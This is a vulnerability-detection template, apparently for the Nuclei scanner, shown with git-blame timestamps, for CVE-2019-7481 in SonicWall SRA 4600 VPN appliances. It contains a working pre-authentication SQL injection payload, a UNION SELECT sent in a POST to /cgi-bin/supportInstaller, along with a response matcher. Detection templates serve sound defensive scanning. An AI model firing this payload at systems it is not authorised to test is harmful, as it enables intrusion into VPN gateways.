2021-06-19 20:39:08 +00:00
|
|
|
id: CVE-2019-7481
|
2021-06-19 20:17:40 +00:00
|
|
|
|
|
|
|
info:
|
2022-04-21 21:16:41 +00:00
|
|
|
name: SonicWall SRA 4600 VPN - SQL Injection
|
2021-06-19 20:17:40 +00:00
|
|
|
author: _darrenmartyn
|
|
|
|
severity: high
|
2022-04-21 21:16:41 +00:00
|
|
|
description: The SonicWall SRA 4600 VPN appliance is susceptible to a pre-authentication SQL injection vulnerability.
|
2021-08-18 11:37:49 +00:00
|
|
|
reference:
|
2021-06-19 20:17:40 +00:00
|
|
|
- https://www.crowdstrike.com/blog/how-ecrime-groups-leverage-sonicwall-vulnerability-cve-2019-7481/
|
2022-04-21 21:16:41 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-7481
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2019-0016
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 7.5
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2019-7481
|
2022-04-21 21:16:41 +00:00
|
|
|
cwe-id: CWE-89
|
2022-07-21 17:18:22 +00:00
|
|
|
tags: cve,cve2019,sonicwall,sqli,kev
|
2021-06-19 20:17:40 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /cgi-bin/supportInstaller HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Accept-Encoding: identity
|
|
|
|
User-Agent: MSIE
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
2021-06-22 07:48:51 +00:00
|
|
|
fromEmailInvite=1&customerTID=unpossible'+UNION+SELECT+0,0,0,11132*379123,0,0,0,0--
|
2021-06-19 20:17:40 +00:00
|
|
|
|
|
|
|
matchers:
|
2021-06-22 07:50:06 +00:00
|
|
|
- type: word
|
|
|
|
words:
|
2021-06-22 07:48:51 +00:00
|
|
|
- "4220397236"
|
2021-06-19 20:17:40 +00:00
|
|
|
part: body
|
2022-04-21 21:16:41 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/04/20
|